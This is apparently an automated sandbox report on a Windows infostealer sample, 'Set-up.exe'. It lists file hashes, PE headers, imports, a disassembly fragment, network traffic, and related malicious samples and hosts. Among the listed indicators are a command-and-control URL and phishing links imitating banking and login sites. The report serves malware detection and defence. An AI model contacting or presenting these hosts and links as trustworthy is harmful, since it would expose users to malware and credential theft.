            unknown
            http://home.eleventj11vt.top/jQURilAbAxjhrGAaBiUq1735578716http://home.eleventj11vt.top/jQURilAbAxjhSet-up.exe, 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://httpbin.org/ipbeforeSet-up.exefalse
              high
              https://curl.se/docs/http-cookies.htmlSet-up.exefalse
                high
                https://curl.se/docs/hsts.html#Set-up.exefalse
                  high
                  http://home.eleventj11vt.top/jQSet-up.exe, Set-up.exe, 00000000.00000003.1793675979.00000000013ED000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793748047.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793963248.000000000140B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1795591258.000000000140C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793878281.00000000013F7000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://home.eleventj11vt.top/jQURilAbAxjhrGAaBiUq17355787165a1Set-up.exe, 00000000.00000003.1793675979.00000000013ED000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1795571963.00000000013FB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793748047.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793878281.00000000013F7000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://curl.se/docs/alt-svc.htmlSet-up.exefalse
                    high
                    http://.cssSet-up.exefalse
                      high
                      http://.jpgSet-up.exefalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        52.202.253.164
                        httpbin.orgUnited States
                        14618AMAZON-AESUSfalse
                        194.87.58.155
                        home.eleventj11vt.topRussian Federation
                        2118RELCOM-ASRelcomGroup19022019RUtrue
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1582587
                        Start date and time:2024-12-31 00:32:06 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 3m 55s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:2
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Set-up.exe
                        Detection:MAL
                        Classification:mal68.troj.spyw.evad.winEXE@1/0@8/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 85%
                        • Number of executed functions: 51
                        • Number of non-executed functions: 157
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated
                        • Exclude process from analysis (whitelisted): SIHClient.exe
                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: Set-up.exe
                        No simulations
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        194.87.58.155Set-up.exeGet hashmaliciousUnknownBrowse
                        • home.eleventh11vs.top/MTLObSmOhYIfQKgEYuXW1735556847
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        httpbin.orgSet-up.exeGet hashmaliciousUnknownBrowse
                        • 34.197.122.172
                        Set-up.exeGet hashmaliciousUnknownBrowse
                        • 52.73.63.247
                        a2mNMrPxow.exeGet hashmaliciousUnknownBrowse
                        • 3.218.7.103
                        SgMuuLxOCJ.exeGet hashmaliciousLummaCBrowse
                        • 34.226.108.155
                        TNyOrM6mIM.exeGet hashmaliciousLummaCBrowse
                        • 3.218.7.103
                        FIyDwZM4OR.exeGet hashmaliciousUnknownBrowse
                        • 3.218.7.103
                        ZFttiy4Tt8.exeGet hashmaliciousUnknownBrowse
                        • 3.218.7.103
                        e62iSl0abZ.exeGet hashmaliciousUnknownBrowse
                        • 3.218.7.103
                        HGFSqmKwd5.exeGet hashmaliciousUnknownBrowse
                        • 34.226.108.155
                        A3nofpjN9A.exeGet hashmaliciousUnknownBrowse
                        • 3.218.7.103
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        AMAZON-AESUSkwari.mips.elfGet hashmaliciousUnknownBrowse
                        • 54.226.65.111
                        Set-up.exeGet hashmaliciousUnknownBrowse
                        • 34.197.122.172
                        https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188Get hashmaliciousKnowBe4Browse
                        • 3.88.121.169
                        https://chase.com-onlinebanking.com/XWmJkMGsxak5lZzdVZUczR3RxTGFWN1g0Q2NKLy96RURPVEpZbEdkOC9nQzY1TStZSjU0T0x4Q05qOXZBRHZnZTZpMmh2eGFmSm9rcVRmV2xBeENiMEF1V3VTOVAvL2dKemVQZkZGNHAxQ1hqTU9WY0R5SGpYeDQ3UVNtNGZpWDJYdWxBUFY5OUFVc3VFU041aHl6aUxrMlBZaGs1Y25BV0xHL1Vhc1BYNVQ5d3laZ2piV3gvTjlUMmc3QWV4QUs2Q0h6Yi0tZ1lEV1pac1JHRzl5ZFpFaC0tcVVpc09xQzZsUzY0bzY0YWpuS1N2Zz09?cid=2342337857Get hashmaliciousKnowBe4Browse
                        • 3.88.121.169
                        securedoc_20241220T111852.htmlGet hashmaliciousUnknownBrowse
                        • 44.219.110.92
                        https://visa-pwr.com/Get hashmaliciousUnknownBrowse
                        • 3.208.228.173
                        botx.mips.elfGet hashmaliciousMiraiBrowse
                        • 52.0.196.218
                        botx.x86.elfGet hashmaliciousMiraiBrowse
                        • 34.206.198.108
                        botx.m68k.elfGet hashmaliciousMiraiBrowse
                        • 54.87.199.101
                        botx.ppc.elfGet hashmaliciousMiraiBrowse
                        • 54.56.4.115
                        RELCOM-ASRelcomGroup19022019RUSet-up.exeGet hashmaliciousUnknownBrowse
                        • 194.87.58.155
                        SgMuuLxOCJ.exeGet hashmaliciousLummaCBrowse
                        • 194.87.58.92
                        TNyOrM6mIM.exeGet hashmaliciousLummaCBrowse
                        • 194.87.58.92
                        j2nLC29vCy.exeGet hashmaliciousLummaCBrowse
                        • 194.87.58.92
                        es5qBEFupj.exeGet hashmaliciousLummaCBrowse
                        • 194.87.58.92
                        vUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                        • 194.87.58.92
                        CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                        • 194.87.58.92
                        arm4.elfGet hashmaliciousUnknownBrowse
                        • 194.58.66.244
                        mips.elfGet hashmaliciousUnknownBrowse
                        • 194.58.66.131
                        ppc.elfGet hashmaliciousUnknownBrowse
                        • 194.58.66.244
                        No context
                        No context
                        No created / dropped files found
                        File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                        Entropy (8bit):6.386639140633175
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.53%
                        • InstallShield setup (43055/19) 0.43%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:Set-up.exe
                        File size:7'101'064 bytes
                        MD5:ae8ed41bd6aaae48ca2b4615d20f52df
                        SHA1:c5d5cfc1e82f7cc7d9c1cf4ed52c1866b35b0bb7
                        SHA256:9633f8eb37d7823206d9f14ad5dfc162c2c757f89726a9f917a42b7edc63244d
                        SHA512:90dafac24cd260491946ec7efd74cb2f1a9cd8c15ae10aa930fd5788601e8cdfa1b776c05bbd56b4772c1116570c3d3178d55866e7a6708056a81b1a3887550a
                        SSDEEP:49152:ZW6ZBOTAG7aw9Z/iq3bfs8KMEcqtoezBm6ruFu+4wvcefb5oq7WKhgMy7v3Kybux:ZWO8aw7j3DXwcUltmOuvqJK3yz8J
                        TLSH:50661861EE8791F9C68305715016B77F6E31AF009C29CFB6CF91FB60C672A12E94E618
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....rg...............(.\N..Pl..2...........pN...@...........................l.......l...@... ............................
                        Icon Hash:90cececece8e8eb0
                        Entrypoint:0x4014a0
                        Entrypoint Section:.text
                        Digitally signed:true
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                        Time Stamp:0x6772D5DF [Mon Dec 30 17:18:23 2024 UTC]
                        TLS Callbacks:0x7890e0, 0x789090
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:51b39aff649af7abc30a06f2362db069
                        Signature Valid:false
                        Signature Issuer:CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US
                        Signature Validation Error:A certificate chain could not be built to a trusted root authority
                        Error Number:-2146762486
                        Not Before, Not After
                        • 26/08/2024 17:01:06 21/08/2025 17:01:06
                        Subject Chain
                        • CN=www.microsoft.com, O=Microsoft Corporation, L=Redmond, S=WA, C=US
                        Version:3
                        Thumbprint MD5:CAAD555B3F3BFF8068AEF82982478996
                        Thumbprint SHA-1:C0F8301C5B214E2D5809CDE74E6904FAADEC01D4
                        Thumbprint SHA-256:54B5E6498A4D19FA2C23C17EDD3542E4DA317021FC264A62F29B837732D50BF7
                        Serial:33009F7B734DB0480411EB0BBA0000009F7B73
                        Instruction
                        mov dword ptr [00A91658h], 00000001h
                        jmp 00007FF4F8E2D8B6h
                        nop
                        mov dword ptr [00A91658h], 00000000h
                        jmp 00007FF4F8E2D8A6h
                        nop
                        sub esp, 1Ch
                        mov eax, dword ptr [esp+20h]
                        mov dword ptr [esp], eax
                        call 00007FF4F91B5116h
                        cmp eax, 01h
                        sbb eax, eax
                        add esp, 1Ch
                        ret
                        nop
                        nop
                        nop
                        nop
                        nop
                        nop
                        nop
                        nop
                        push ebp
                        mov ebp, esp
                        push edi
                        push esi
                        push ebx
                        sub esp, 1Ch
                        mov dword ptr [esp], 00938000h
                        call dword ptr [00A939A8h]
                        sub esp, 04h
                        test eax, eax
                        je 00007FF4F8E2DC75h
                        mov ebx, eax
                        mov dword ptr [esp], 00938000h
                        call dword ptr [00A93A1Ch]
                        mov edi, dword ptr [00A939BCh]
                        sub esp, 04h
                        mov dword ptr [00A8F028h], eax
                        mov dword ptr [esp+04h], 00938013h
                        mov dword ptr [esp], ebx
                        call edi
                        sub esp, 08h
                        mov esi, eax
                        mov dword ptr [esp+04h], 00938029h
                        mov dword ptr [esp], ebx
                        call edi
                        sub esp, 08h
                        mov dword ptr [008E7004h], eax
                        test esi, esi
                        je 00007FF4F8E2DC13h
                        mov dword ptr [esp+04h], 00A8F02Ch
                        mov dword ptr [esp], 00A8A104h
                        call esi
                        mov dword ptr [esp], 00401580h
                        call 00007FF4F8E2DB63h
                        lea esp, dword ptr [ebp-0Ch]
                        pop ebx
                        pop esi
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x6930000x2dac.idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x6c54000x688.reloc
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x6980000x34d78.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x67fc800x18.rdata
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x6938140x620.idata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x4e5b1c0x4e5c007bbcd128f71d214c2f29db413ac5c236unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .data0x4e70000x508c40x50a0096672f8c731cab8f63e4186721b1ffd2False0.07211421996124032dBase III DBT, version number 0, next free block index 10, 1st item "\321L{"0.9772299122675231IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rdata0x5380000x151ab80x151c005b8f3a539641ddb5d96dfd3fbcd16730False0.4205666520170244data6.2763796853009515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .eh_fram0x68a0000x4d640x4e0033fa595056138dabb89943d42c42f28fFalse0.31986177884615385data4.916502486158787IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .bss0x68f0000x31800x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata0x6930000x2dac0x2e00cee0450c995256983c3c16af4e4ca77aFalse0.36837635869565216data5.342966000960136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .CRT0x6960000x300x200fe2a65d4187b984679c52ae93485940eFalse0.0625data0.2233456448570176IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .tls0x6970000x80x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .reloc0x6980000x34d780x34e00c4cc72fb886458d350b272e885c309f6False0.4961537751182033data6.657792385198591IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                        DLLImport
                        ADVAPI32.dllCryptAcquireContextA, CryptAcquireContextW, CryptCreateHash, CryptDecrypt, CryptDestroyHash, CryptDestroyKey, CryptEnumProvidersW, CryptExportKey, CryptGenRandom, CryptGetHashParam, CryptGetProvParam, CryptGetUserKey, CryptHashData, CryptReleaseContext, CryptSetHashParam, CryptSignHashW, DeregisterEventSource, RegCloseKey, RegEnumKeyExA, RegNotifyChangeKeyValue, RegOpenKeyExA, RegOpenKeyExW, RegQueryValueExA, RegisterEventSourceW, ReportEventW, SystemFunction036
                        bcrypt.dllBCryptGenRandom
                        CRYPT32.dllCertCloseStore, CertDuplicateCertificateContext, CertEnumCertificatesInStore, CertFindCertificateInStore, CertFreeCertificateContext, CertGetCertificateContextProperty, CertGetEnhancedKeyUsage, CertGetIntendedKeyUsage, CertOpenStore, CertOpenSystemStoreA, CertOpenSystemStoreW
                        GDI32.dllBitBlt, CreateCompatibleBitmap, CreateCompatibleDC, DeleteDC, DeleteObject, GetDeviceCaps, SelectObject
                        gdiplus.dllGdipGetImageEncoders, GdipGetImageEncodersSize, GdiplusShutdown, GdiplusStartup
                        IPHLPAPI.DLLConvertInterfaceIndexToLuid, ConvertInterfaceLuidToNameA, FreeMibTable, GetAdaptersAddresses, GetBestRoute2, GetUnicastIpAddressTable, if_indextoname, if_nametoindex
                        KERNEL32.dllAcquireSRWLockExclusive, CancelIo, CloseHandle, CompareFileTime, ConvertFiberToThread, ConvertThreadToFiberEx, CreateEventA, CreateFiberEx, CreateFileA, CreateFileMappingA, CreateIoCompletionPort, CreateMutexA, CreateSemaphoreW, CreateThread, CreateToolhelp32Snapshot, DeleteCriticalSection, DeleteFiber, EnterCriticalSection, ExpandEnvironmentStringsA, FindClose, FindFirstFileA, FindFirstFileW, FindNextFileW, FormatMessageW, FreeLibrary, GetACP, GetConsoleMode, GetCurrentProcessId, GetCurrentThreadId, GetDiskFreeSpaceExA, GetDriveTypeA, GetEnvironmentVariableA, GetEnvironmentVariableW, GetFileAttributesA, GetFileType, GetLastError, GetLogicalDriveStringsA, GetModuleFileNameA, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetNativeSystemInfo, GetOverlappedResult, GetProcAddress, GetProcessHeap, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTime, GetSystemTimeAsFileTime, GetThreadLocale, GetTickCount64, GetTickCount, GetTimeZoneInformation, GetVersion, GetVersionExA, GlobalMemoryStatusEx, HeapAlloc, HeapFree, InitializeConditionVariable, InitializeCriticalSection, IsBadReadPtr, IsDBCSLeadByteEx, K32EnumProcesses, LeaveCriticalSection, LoadLibraryA, LoadLibraryW, MapViewOfFile, MoveFileExA, MultiByteToWideChar, OpenProcess, PeekNamedPipe, PostQueuedCompletionStatus, Process32First, Process32Next, QueryFullProcessImageNameA, QueryPerformanceCounter, QueryPerformanceFrequency, ReadConsoleA, ReadConsoleW, ReadFile, RegisterWaitForSingleObject, ReleaseSRWLockExclusive, ReleaseSemaphore, SetConsoleMode, SetFileCompletionNotificationModes, SetHandleInformation, SetLastError, SetUnhandledExceptionFilter, Sleep, SleepConditionVariableCS, SleepEx, SwitchToFiber, SystemTimeToFileTime, TlsAlloc, TlsGetValue, TlsSetValue, UnmapViewOfFile, UnregisterWait, VerSetConditionMask, VerifyVersionInfoW, VirtualAlloc, VirtualFree, VirtualLock, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WaitNamedPipeA, WakeAllConditionVariable, WakeConditionVariable, WideCharToMultiByte, WriteFile, lstrlenA
                        msvcrt.dll__mb_cur_max, __setusermatherr, _findclose, _fullpath, _lock, _strnicmp, _unlock, getc, islower, isxdigit, localeconv, ungetc, vfprintf, _findnext, _findfirst, _open
                        ole32.dllCreateStreamOnHGlobal
                        SHELL32.dllSHGetKnownFolderPath
                        api-ms-win-crt-convert-l1-1-0.dllatoi, mbstowcs, strtol, strtoll, strtoul, wcstombs
                        api-ms-win-crt-environment-l1-1-0.dll__p__environ, __p__wenviron, getenv
                        api-ms-win-crt-filesystem-l1-1-0.dll_fstat64, _stat64, _unlink
                        api-ms-win-crt-heap-l1-1-0.dll_set_new_mode, calloc, free, malloc, realloc
                        api-ms-win-crt-locale-l1-1-0.dllsetlocale
                        api-ms-win-crt-math-l1-1-0.dll_fdopen
                        api-ms-win-crt-private-l1-1-0.dllmemchr, memcmp, memcpy, memmove, strchr, strrchr, strstr, wcsstr
                        api-ms-win-crt-runtime-l1-1-0.dll_set_app_type, __p___argc, __p___argv, __p___wargv, __p__acmdln, __sys_errlist, __sys_nerr, _assert, _cexit, _configure_narrow_argv, _configure_wide_argv, _crt_at_quick_exit, _crt_atexit, _errno, _exit, _fpreset, _initialize_narrow_environment, _initialize_wide_environment, _initterm, _set_invalid_parameter_handler, abort, exit, raise, signal, strerror
                        api-ms-win-crt-stdio-l1-1-0.dll__acrt_iob_func, __p__commode, __p__fmode, __stdio_common_vfwprintf, __stdio_common_vsprintf, __stdio_common_vsscanf, __stdio_common_vswprintf, _fileno, _fseeki64, _lseeki64, _wfopen, _write, fclose, feof, ferror, fflush, fgets, fopen, fputc, fputs, fread, fseek, ftell, fwrite, rewind, setvbuf, _write, _setmode, _read, _open, _fileno, _close
                        api-ms-win-crt-string-l1-1-0.dll_strlwr_s, isspace, isupper, memset, strcat, strcmp, strcpy, strcspn, strlen, strncat, strncmp, strncpy, strpbrk, strspn, tolower, wcscat, wcscmp, wcscpy, wcslen, _wcsnicmp, _stricmp, _strdup, _strdup
                        api-ms-win-crt-time-l1-1-0.dll__daylight, __timezone, __tzname, _difftime32, _difftime64, _gmtime64, _mktime64, _time32, _time64, _tzset, strftime
                        api-ms-win-crt-utility-l1-1-0.dll_byteswap_uint64, bsearch, qsort, rand, srand
                        USER32.dllCharUpperA, EnumDisplayMonitors, EnumWindows, FindWindowA, GetDC, GetProcessWindowStation, GetSystemMetrics, GetUserObjectInformationW, GetWindowTextA, MessageBoxW, ReleaseDC, SendMessageA
                        WS2_32.dllWSACleanup, WSACloseEvent, WSACreateEvent, WSAEnumNetworkEvents, WSAEventSelect, WSAGetLastError, WSAIoctl, WSAResetEvent, WSASetEvent, WSASetLastError, WSAStartup, WSAStringToAddressW, WSAWaitForMultipleEvents, __WSAFDIsSet, accept, bind, closesocket, connect, gethostbyaddr, gethostbyname, gethostname, getpeername, getservbyname, getservbyport, getsockname, getsockopt, htonl, htons, inet_addr, inet_ntoa, ioctlsocket, listen, ntohl, ntohs, recv, recvfrom, select, send, sendto, setsockopt, shutdown, socket
                        TimestampSource PortDest PortSource IPDest IP
                        Dec 31, 2024 00:32:58.602870941 CET49730443192.168.2.452.202.253.164
                        Dec 31, 2024 00:32:58.602905989 CET4434973052.202.253.164192.168.2.4
                        Dec 31, 2024 00:32:58.602967024 CET49730443192.168.2.452.202.253.164
                        Dec 31, 2024 00:32:58.606178999 CET49730443192.168.2.452.202.253.164
                        Dec 31, 2024 00:32:58.606189966 CET4434973052.202.253.164192.168.2.4
                        Dec 31, 2024 00:32:59.298430920 CET4434973052.202.253.164192.168.2.4
                        Dec 31, 2024 00:32:59.299170971 CET49730443192.168.2.452.202.253.164
                        Dec 31, 2024 00:32:59.299184084 CET4434973052.202.253.164192.168.2.4
                        Dec 31, 2024 00:32:59.300518036 CET4434973052.202.253.164192.168.2.4
                        Dec 31, 2024 00:32:59.300587893 CET49730443192.168.2.452.202.253.164
                        Dec 31, 2024 00:32:59.302103996 CET49730443192.168.2.452.202.253.164
                        Dec 31, 2024 00:32:59.302165985 CET4434973052.202.253.164192.168.2.4
                        Dec 31, 2024 00:32:59.309395075 CET49730443192.168.2.452.202.253.164
                        Dec 31, 2024 00:32:59.309401989 CET4434973052.202.253.164192.168.2.4
                        Dec 31, 2024 00:32:59.363308907 CET49730443192.168.2.452.202.253.164
                        Dec 31, 2024 00:32:59.831645012 CET4434973052.202.253.164192.168.2.4
                        Dec 31, 2024 00:32:59.831772089 CET4434973052.202.253.164192.168.2.4
                        Dec 31, 2024 00:32:59.831995010 CET49730443192.168.2.452.202.253.164
                        Dec 31, 2024 00:32:59.833048105 CET49730443192.168.2.452.202.253.164
                        Dec 31, 2024 00:32:59.833066940 CET4434973052.202.253.164192.168.2.4
                        Dec 31, 2024 00:33:02.966679096 CET4973180192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:02.971477985 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:02.971559048 CET4973180192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:02.972390890 CET4973180192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:02.977246046 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:02.977277040 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:02.977292061 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:02.977300882 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:02.977308989 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:02.977345943 CET4973180192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:02.977387905 CET4973180192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:02.977407932 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:02.977416992 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:02.977431059 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:02.977437973 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:02.977473021 CET4973180192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:02.981930017 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:02.981987000 CET4973180192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:02.982121944 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:02.982180119 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:02.982182026 CET4973180192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:02.982188940 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:02.982198954 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:02.982213974 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:02.982222080 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:02.982243061 CET4973180192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:02.982269049 CET4973180192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:03.025032043 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:03.025193930 CET4973180192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:03.073311090 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:03.073389053 CET4973180192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:03.124761105 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:03.125004053 CET4973180192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:03.172936916 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:03.173094034 CET4973180192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:03.221045971 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:03.221132994 CET4973180192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:03.269021034 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:03.269231081 CET4973180192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:03.320913076 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:03.321033955 CET4973180192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:03.368798018 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:03.368999004 CET4973180192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:03.416805983 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:03.417052984 CET4973180192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:03.421319008 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:03.421542883 CET4973180192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:03.421863079 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:03.421932936 CET4973180192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:03.426537991 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:03.426546097 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:03.426553965 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:03.426557064 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:03.426606894 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:03.426615953 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:03.426623106 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:03.426631927 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:03.426652908 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:03.426661015 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:03.426667929 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:03.426676989 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:03.426714897 CET4973180192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:03.426765919 CET4973180192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:03.426843882 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:03.426903009 CET4973180192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:03.426992893 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:03.427001953 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:03.427011013 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:03.427067041 CET4973180192.168.2.4194.87.58.155
